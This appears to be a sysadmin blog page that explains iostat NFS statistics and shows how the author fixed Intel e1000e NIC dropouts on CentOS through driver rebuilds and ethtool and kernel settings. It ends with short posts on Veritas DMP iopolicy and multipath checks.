The -xn directives instruct iostat to report extended disk statistics in tabular form, as well as display the names of the devices in descriptive format (for example, server:/export/path). The following example shows the output of iostat -xn 20 during NFS activity on the client, while it concurrently reads from two separate NFS filesystems. The server assisi is connected to the same hub to which the client is connected, while the test server paris is on the other side of the hub and other side of the building network switches. The two servers are identical; they have the same memory, CPU, and OS configuration:


% iostat -xn 20
...
extended device statistics
r/s w/s kr/s kw/s wait actv wsvc_t asvc_t %w %b device
0.0 0.1 0.0 0.4 0.0 0.0 0.0 3.6 0 0 c0t0d0
0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0 0 fd0
0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0 0 rome:vold(pid239)
9.7 0.0 310.4 0.0 0.0 3.3 0.2 336.7 0 100 paris:/export
34.1 0.0 1092.4 0.0 0.0 3.2 0.2 93.2 0 99 assisi:/export


The iostat utility iteratively reports the disk statistics every 20 seconds and calculates its statistics based on a delta from the previous values. The first set of statistics is usually uninteresting, since it reports the cumulative values since boot time. You should focus your attention on the following set of values reporting the current disk and network activity. Note that the previous example does not show the cumulative statistics. The output shown represents the second set of values, which report the I/O statistics within the last 20 seconds. The first two lines represent the header, then every disk and NFS filesystem on the system is presented in separate lines. The first line reports statistics for the local hard disk c0t0d0. The second line reports statistics for the local floppy disk fd0. The third line reports statistics for the volume manager vold. In Solaris, the volume manager is implemented as an NFS user-level server. The fourth and fifth lines report statistics for the NFS filesystems mounted on this host. Included in the statistics are various values that will help you analyze the performance of the NFS activity:

r/s
Represents the number of read operations per second during the time interval specified. For NFS filesystems, this value represents the number of times the remote server was called to read data from a file, or read the contents of a directory. This quantity accounts for the number of read, readdir, and readdir+ RPCs performed during this interval. In the previous example, the client contacted the server assisi an average of 34.1 times per second to either read the contents of a file, or list the contents of directories.

w/s
Represents the number of write operations per second during the time interval specified. For NFS filesystems, this value represents the number of times the remote server was called to write data to a file. It does not include directory operations such as mkdir, rmdir, etc. This quantity accounts for the number of write RPCs performed during this interval.

kr/s
Represents the number of kilobytes per second read during this interval. In the preceding example, the client is reading data at an average of 1,092.4 KB/s from the NFS server assisi. The optional -M directive would instruct iostat to display data throughput in MB/sec instead of KB/sec.

kw/s
Represents the number of kilobytes written per second during this interval. The optional -M directive would instruct iostat to display data throughput in MB/sec.

wait
Reports the average number of requests waiting to be processed. For NFS filesystems, this value gets incremented when a request is placed on the asynchronous request queue, and gets decreased when the request is taken off the queue and handed off to an NFS async thread to perform the RPC call. The length of the wait queue indicates the number of requests waiting to be sent to the NFS server.
actv
Reports the number of requests actively being processed (i.e., the length of the run queue). For NFS filesystems, this number represents the number of active NFS async threads waiting for the NFS server to respond (i.e., the number of outstanding requests being serviced by the NFS server). In the preceding example, the client has on average 3.2 outstanding RPCs pending for a reply by the server assisi at all times during the interval specified. This number is controlled by the maximum number of NFS async threads configured on the system. Chapter 18 will explain this in more detail.
wsvc_t
Reports the time spent in the wait queue in milliseconds. For NFS filesystems, this is the time the request waited before it could be sent out to the server.
asvc_t
Reports the time spent in the run queue in milliseconds. For NFS filesystems, this represents the average amount of time the client waits for the reply to its RPC requests, after they have been sent to the NFS server. In the preceding example, the server assisi takes on average 93.2 milliseconds to reply to the client's requests, where the server paris takes 336.7 milliseconds. Recall that the server assisi and the client are physically connected to the same hub, whereas packets to and from the server paris have to traverse multiple switches to communicate with the client. Analysis of nfsstat -s on paris indicated a large amount of NFS traffic directed at this server at the same time. This, added to server load, accounts for the slow response time.
%w
Reports the percentage of time that transactions are present in the wait queue ready to be processed. A large number for an NFS filesystem does not necessarily indicate a problem, given that there are multiple NFS async threads that perform the work.

%b
Reports the percentage of time that actv is non-zero (at least one request is being processed). For NFS filesystems, it represents the activity level of the server mount point. 100% busy does not indicate a problem, since the NFS server has multiple nfsd threads that can handle concurrent RPC requests. It simply indicates that the client has had requests continuously processed by the server during the measurement time.

Resolved Intel e1000e driver bug on 82574L Ethernet controller causing network blipping

April 1st, 2012

Earlier I posted a question about CentOS 6.2 losing its internet connection intermittently. Now I finally have the right way to fix it.

Firstly, this is a known bug in the Intel e1000e driver on Linux platforms, a driver problem with the Intel 82574L (an MSI/MSI-X interrupt issue). The internet connection drops now and then, and nothing is logged about it, which is very bad for troubleshooting.
You can see more bug reports about this at https://bugzilla.redhat.com/show_bug.cgi?id=632650

Fortunately, we can resolve this by installing the kmod-e1000e package from ELRepo.org. To solve this, do the following (ignore the struck-out lines):

  • Install kmod-e1000e offered by Elrepo

Import the public key:
rpm --import http://elrepo.org/RPM-GPG-KEY-elrepo.org

To install ELRepo for RHEL-5, SL-5 or CentOS-5:
rpm -Uvh http://elrepo.org/elrepo-release-5-3.el5.elrepo.noarch.rpm

To install ELRepo for RHEL-6, SL-6 or CentOS-6:
rpm -Uvh http://elrepo.org/elrepo-release-6-4.el6.elrepo.noarch.rpm

Before installing the new driver, let's look at the old one:
[root@doxer sites]# lspci |grep -i ethernet
02:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection
03:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection

[root@doxer modprobe.d]# lsmod|grep e100
e1000e 219500 0

[root@doxer modprobe.d]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/kernel/drivers/net/e1000e/e1000e.ko
version: 1.4.4-k
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 6BD7BCA22E0864D9C8B756A

Now let's install the new kmod-e1000e offered by elrepo:
[root@doxer yum.repos.d]# yum list|grep -i e1000
kmod-e1000.x86_64 8.0.35-1.el6.elrepo elrepo
kmod-e1000e.x86_64 1.9.5-1.el6.elrepo elrepo

[root@doxer yum.repos.d]# yum -y install kmod-e1000e.x86_64

After installation, reboot your machine, and you'll find the driver updated:
[root@doxer ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/weak-updates/e1000e/e1000e.ko
version: 1.9.5-NAPI
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 16A9E37B9207620F5453F5E

[root@doxer ~]# lsmod|grep e100
e1000e 229197 0

  • change kernel parameter
Append the following parameters to grub.conf kernel line:

pcie_aspm=off e1000e.IntMode=1,1 e1000e.InterruptThrottleRate=10000,10000 acpi=off
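
For example, the kernel line in /boot/grub/grub.conf would end up looking something like this (the kernel version and root device here are assumptions, keep your own):

kernel /vmlinuz-2.6.32-220.7.1.el6.x86_64 ro root=/dev/mapper/vg_root-lv_root pcie_aspm=off e1000e.IntMode=1,1 e1000e.InterruptThrottleRate=10000,10000 acpi=off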

  • change NIC parameters(you should add these lines to /etc/rc.local)

#disable pause autonegotiate
/sbin/ethtool -A eth0 autoneg off
/sbin/ethtool -s eth0 autoneg off
#change tx ring buffer
/sbin/ethtool -G eth0 tx 4096 #maybe too large (consider 512). To increase the interrupt rate: ethtool -C eth0 rx-usecs 10 <10000 interrupts per second>
#change rx ring buffer
/sbin/ethtool -G eth0 rx 128
#disable wake on line
/sbin/ethtool -s eth0 wol d
#turn off offload
/sbin/ethtool -K eth0 tx off rx off sg off tso off gso off gro off
#enable TX pause
/sbin/ethtool -A eth0 tx on
#disable ASPM
/sbin/setpci -s 02:00.0 CAP_EXP+10.b=40
/sbin/setpci -s 00:19.0 CAP_EXP+10.b=40

PS:

  1. pcie_aspm is abbr for Active-State Power Management. This is somehow related to powersaving mechanism, you can get more info here.
  2. acpi is abbr for Advanced Configuration and Power Interface, you can refer to here
  3. apic is abbr for Advanced Programmable Interrupt Controller, it's somehow related to IRQ<Interrupt Request>. apic is one kind of many PICs, intel and some other NICs have this feature. You can read more info about this here.

Now reboot your machine and you're expected to have a more steady networking!

PS2:

The reason there are so many strikeouts in this article is that I struggled a lot with this bug. Firstly, I thought it was caused by a kernel bug in the e1000e driver, and after some searching I installed the kmod-e1000e driver and modified the kernel parameters. Things got better for a short time. Later, I found the issue was still there, so I tried compiling the latest e1000e driver from Intel. But that didn't work either.

Later, I ran a script which monitored the network around the times the NIC went down. After the NIC failed several times, I found that Tx traffic was extremely high each time the NIC went down (TX bytes went up by something like 5Gb in a very short time). Based on this, I realized there might be a DoS attack on the server. Using ntop & tcpdump, I found that DNS traffic was very large, but my host was not providing DNS services at all!
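
Such a monitor can be as simple as this sketch (the interface, gateway and log path are assumptions, not the original script):

#!/bin/bash
#log NIC state and TX counters every 10 seconds, so we can see what happened right before a failure
while true; do
date >> /var/log/nic-watch.log
ip -s link show eth0 >> /var/log/nic-watch.log
ping -c 1 -W 2 192.168.1.1 >/dev/null 2>&1 || echo "gateway unreachable via eth0" >> /var/log/nic-watch.log
sleep 10
done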

Then I wrote some iptables rules to disallow DNS queries etc., and after that the host became stable again! Traffic went back to normal, and everything is on track now. I'm very happy and excited about this, as it's the first time I've stopped a DoS attack!

This problem is due to a bug in the Intel NIC's MSI and/or MSI-X interrupts. To solve it, download the latest Intel 82574L driver here. After downloading the source tarball to your server, follow these steps from the driver's README file:

  1. unzip: tar zxf e1000e-x.x.x.tar.gz
  2. cd e1000e-x.x.x/src/
  3. make CFLAGS_EXTRA=-DDISABLE_PCI_MSI install #this step is critical
  4. rmmod e1000e; modprobe e1000e
  5. add e1000e to /etc/modprobe.conf
  6. reboot server
After that, when you check the Intel e1000e driver module, you should see:

[root@doxer ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko
version: 1.10.6-NAPI
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>

.....blablabla.....

vermagic:       2.6.32-220.7.1.el6.x86_64 SMP mod_unload modversions

parm: copybreak:Maximum size of packet that is copied to a new buffer on receive (uint)
parm: TxIntDelay:Transmit Interrupt Delay (array of int)
parm: TxAbsIntDelay:Transmit Absolute Interrupt Delay (array of int)
parm: RxIntDelay:Receive Interrupt Delay (array of int)
parm: RxAbsIntDelay:Receive Absolute Interrupt Delay (array of int)
parm: InterruptThrottleRate:Interrupt Throttling Rate (array of int)
parm: IntMode:Interrupt Mode (array of int)
parm: SmartPowerDownEnable:Enable PHY smart power down (array of int)
parm: KumeranLockLoss:Enable Kumeran lock loss workaround (array of int)
parm: CrcStripping:Enable CRC Stripping, disable if your BMC needs the CRC (array of int)
parm: EEE:Enable/disable on parts that support the feature (array of int)
parm: Node:[ROUTING] Node to allocate memory on, default -1 (array of int)

And also, you may need to add pcie_aspm=off to the kernel cmd line in file /boot/grub/menu.lst to disable Active-State Power Management which may cause problems.

That's all steps to fix Intel e1000e driver bug on 82574L Ethernet controller.

NOTE: Please do not follow the kmod-e1000e steps shown (struck out) earlier in this post; they proved unable to solve this 82574L driver bug!

You should get better networking on Linux now. Enjoy!

PS:

Actually, there's a lot of talk over the internet about this problem, so I know it's not only me who was annoyed by this weird issue!

http://www.google.com.hk/search?hl=en&newwindow=1&safe=strict&q=Intel+e1000e+driver+bug&oq=Intel+e1000e+driver+bug&aq=f&aqi=&aql=&gs_l=serp.3...9108l9252l0l9707l2l2l0l0l0l0l0l0ll0l0.frgbld.

Dear RSS readers, please re-subscribe to this feed

April 1st, 2012

Dear RSS readers,

I'm very sorry, but I've changed my blog's feed address to a new one: http://feeds2.feedburner.com/doxerorg/learnlinuxblog. Could you please unsubscribe and then subscribe to this new RSS address?

Sorry again for the inconvenience. I'll keep sharing what I learn with all of you and the Internet, just as before (let's call it open source spirit).

Thanks, and have a good day!

Categories: IT Architecture, Linux, Systems

use vxdmpadm to set IBM xiv’s enclosure iopolicy to round-robin

April 1st, 2012

#!/bin/ksh

for xiv in $(/usr/sbin/vxdmpadm listenclosure all | awk '{print $1}' | grep xiv)

do
vxdmpadm setattr enclosure $xiv iopolicy=round-robin
done
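
You can verify the change afterwards with:

vxdmpadm getattr enclosure <xiv-enclosure-name> iopolicy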

Categories: Hardware, Storage

check multipath information on solaris or linux

April 1st, 2012

If the FS is vxfs:

vxdmpadm listctlr all
symmask list hba
for i in `vxdisk list | grep -v DEVICE | awk '{print $1}'`; do vxdmpadm getsubpaths dmpnodename=$i;done

If the host is solaris:

 /usr/sbin/cfgadm -la|grep fabric && vxdisk list

If you see DISABLED paths after checking, first check your hardware connections. After that, do a symcfg discover to refresh the EMC SYMAPI database files on the host, and then use vxdmpadm enable ctlr=<your controller tag> to enable the controller, or vxdmpadm enable path=<your path tag> to enable DMP on that specific path.

If you want to check the HBA's info, you may try:

symmask list hba #EMC SYMCLI

fcinfo hba-port -l #solaris
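
If the host is Linux with native device-mapper multipath, the rough equivalents are (a sketch):

multipath -ll #multipath topology and per-path states
cat /sys/class/fc_host/host*/port_state #quick HBA port state check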

Or refer to this article.